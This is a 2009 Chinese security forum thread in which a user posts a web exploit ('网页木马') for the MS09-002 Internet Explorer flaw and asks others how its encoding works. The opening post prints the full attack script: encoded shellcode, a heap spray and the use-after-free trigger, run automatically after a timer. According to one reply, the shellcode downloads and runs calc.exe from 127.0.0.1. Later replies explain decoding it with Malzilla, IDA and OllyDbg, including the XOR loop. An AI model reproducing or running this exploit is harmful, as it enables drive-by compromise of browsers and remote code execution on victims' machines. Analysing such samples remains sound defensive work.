瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 请求一个网页木马的加密方式分析
dby107 - 2009-11-25 22:21:00


<script language="JavaScript">
var c=unescape("%u6A60%u5830%u8B64%uC108%u04E0%u0C8D%u6801%u526B%u6D34%u3958%u7501%uC301%u0189%u16EB%u335B%u66C9%u1FB8%u665F%u0431%u414B%u6640%uF981%u015B%uF37C%u05EB%uE5E8%uFFFF%uF6FF%u2204%u215F%u4800%u7A6F%uAF3B%uAE5E%u8EC7%u275F%uA35F%u251F%u5AD4%u8643%u44D4%uA657%uAFA8%u2FB3%u305D%uB45F%u4784%uF458%u1019%u6796%u6501%u3E35%uD006%u38BB%u3A5F%uC2BD%uBC1F%uFE67%uC42A%u79D6%u2A6F%u185D%uD6B7%u435E%uA65F%u2FA6%u1F5E%u2837%u4831%u215F%u382A%u2633%uC70B%uA559%u4F59%u4F5F%uB8CA%u50EB%u525F%u6E37%u541F%u3F5F%u3CA0%u69A0%u7484%u097B%u0E0F%u0DA0%uD77F%u359B%u9A4E%u5E97%u6037%uF7C3%u36C9%u9C0F%u7809%u8E17%u995C%u7709%u5835%u0D06%u73D4%uC0D2%u685F%u6D5F%uF5D4%u6FF7%u705F%u8CD4%u9B09%u7389%u745F%u8601%u28FA%u09D4%u907B%u7844%u7A5F%u6135%u7135%u7D35%uBBD4%u7B5C%u46C3%uE958%u2918%u8499%u0F9C%uAD21%u86B7%u875E%uE25F%uE362%uE069%u0078%u8F9A%u115B%u8999%uC837%u56F4%u5258%uECD4%u7B47%u94BA%u955F%uFE37%u9D57%uF05F%u9137%u9A55%uCE37%u70D4%u1635%u025B%uACF4%uF09F%uCB0F%u29A0%u3F5B%u29F5%u96E1%uA65E%uF05F%u5737%uA95F%u555F%uAF09%u6B5C%uAD98%uC23E%u8138%uF098%uD45B%uD727%uE45F%uE2A0%u8657%uE584%uE00C%uFED2%uE96B%u450C%u9709%u7C6C%u41D4%uAC35%u1406%u3DBD%u0639%uE61B%uC263%u4F5E%u48A3%uD618%u900E%u990F%u980E%u9B0E%u9A0E%u5AD2%uCC6C%uCE5F%u9E0D%u86A0%u2E53%uC209%u85D4%u956F%u8704%u375C%u365C%u395C%u385C%u36DC%u815B%u570C%u3F85%u8CA8%u3FA0%uC5B7%u1EA0%u88A0%uBB76%u6969%uC10B%u2B5B%u2571%uE87F%uD935%u5007%uE85F%u93A1%uFFA0%uCE9D%u855F%uA86D%uF1E5%u0C5C%u0C20%u364D%uF57B%u06E7%uF75F%uCE5F%uADD2%uFE7B%uD592%uE89D%u455F%uFF4A%uFF5F%u05B4%u1ED8%u0261%uB960%u0760%u7A9E%u149F%u13A2%u5A60%u6334%u6064%u5C40%u5A9F%u5774%u5FA3%u4AEB%u555C%u4DEB%u6D48%u102D%u9FBD%u1673%u25B5%u5EA9%u9321%u9364%u5EED%u1948%u2F00%u12A9%u0EDE%uC95A%u2814%uE8A1%u2167%u63AA%uD58B%u2A59%u5301%uAC81%u3823%uEC63%u2EEB%u80E8%uEF39%u7B31%u5BEB%uA45C%u1E14%u3218%u6495%u45EB%u3740%u0695%u7FA9%u9A21%uFD63%uE253%u846F%u0170%u48B6%uFC68%u39AB%uE563%uAB20%u7A91%u377F%u1D87%u1AEB%u4644%u20BD%u4BEB%uC32B%u553E%u9763%u4FEB%u4FEB%uE6A5%u173E%uA7A3%uADC0%uAE9F%u2652%u5FF1%uB659%uD61D%u6F19%uCF86%u10BA%u641B%uD519%u3BAC%uF87E%uB204%u1690%u621B%u8AF9%uDCF0%u2CE9%u7CDA%u2991%uB045%uE72D%u7650%uBEE0%uF3CF%u6A60%u6B60%u1808%u1D14%u415A%u5E4F%u4752%u414E%u424E%u424E%u174F%u1901%u5803%u0F05%u7805%uFC60%u7AE0%u0060");
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",1000);</script>


MS09-002的网页木马,分析了办天,还没有解出来。
我去%u替换了,应该是16进度,但是不行呀。。。。。
请高人分析解答一下。谢谢

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
dby107 - 2009-11-25 23:18:00
:kaka4: 没人。。。帮帮我呀
BlastXiang - 2009-11-25 23:25:00
生成exe调试 我这儿到LoadLibraryExA加载urlmon.dll时候会卡住 不过内存里面能看到地址127.0.0.1/calc.exe了
dby107 - 2009-11-25 23:51:00
没明白。。。

这个是什么加密方式呢?该怎么解?
shadowmin - 2009-11-26 7:42:00
shellcode
解的时候可能需要密钥,
或者你可以用OD调试
相当于把上面的shellcode生成EXE文件,然后用OD调试。
dby107 - 2009-11-26 11:09:00
汗,等于没说,调试什么啊?
linux_feixue - 2009-11-26 13:02:00
你吧c=unescape("%u6A60。。。里面的内容,转化成16进制,用Malzilla,转存为hexbin
然后将文件加载进IDA,你会看见里面的代码有加密
seg000:00000023                        loc_23:                                ; CODE XREF: sub_1C+12j
seg000:00000023 66 31 04 4B                            xor    [ebx+ecx*2], ax
seg000:00000027 41                                      inc    ecx
seg000:00000028 40                                      inc    eax
seg000:00000029 66 81 F9 5B 01                          cmp    cx, 15Bh
seg000:0000002E 7C F3                                  jl      short loc_23

这就是那个加密循环,写个简单的IDC脚本,就可以搞定了,或者像楼上的人说的,将这段代码移植calc.exe 的入口点,用OD加载执行
dby107 - 2009-11-26 13:45:00
:kaka3: 也太麻烦了吧,不会操作:kaka6:
BlastXiang - 2009-11-26 18:12:00
redoce:
执行:“9>ShellCode至Exe”-复制%u部分到上方代码区,点“去除无效字符”和“%u整理”,再点“生成exe”,生成的东西就能用来调试了
dby107 - 2009-11-26 18:50:00
哦,但我不是要它的木马地址。
而是一个完整的代码:kaka4:

有没有办法啊?
linux_feixue - 2009-11-27 14:37:00
你要会用些工具,不要怕麻烦,把unescape中的code先转化转存为2进制文件,然后用IDA来分析里面的代码,或者直接植入到calc.exe
的入口点,用OD调试,我看这是最简单直接的方法了。
networkedition - 2009-11-27 14:53:00
这个shellcode是需要使用od或ida进行调试才可以得出地址的,涉及到了反汇编的知识。正如ls的大牛反馈的,会用工具就容易的很。会者不难嘛:kaka12:
jks_风 - 2010-7-29 0:05:00
无名老师“会者不难”:kaka6:

表算我挖坟 偶也要研究研究 这个不是密匙的问题
FrankPJ - 2010-7-30 12:56:00
貌似溢出汇编代码,不是一般的挂马
1
查看完整版本: 请求一个网页木马的加密方式分析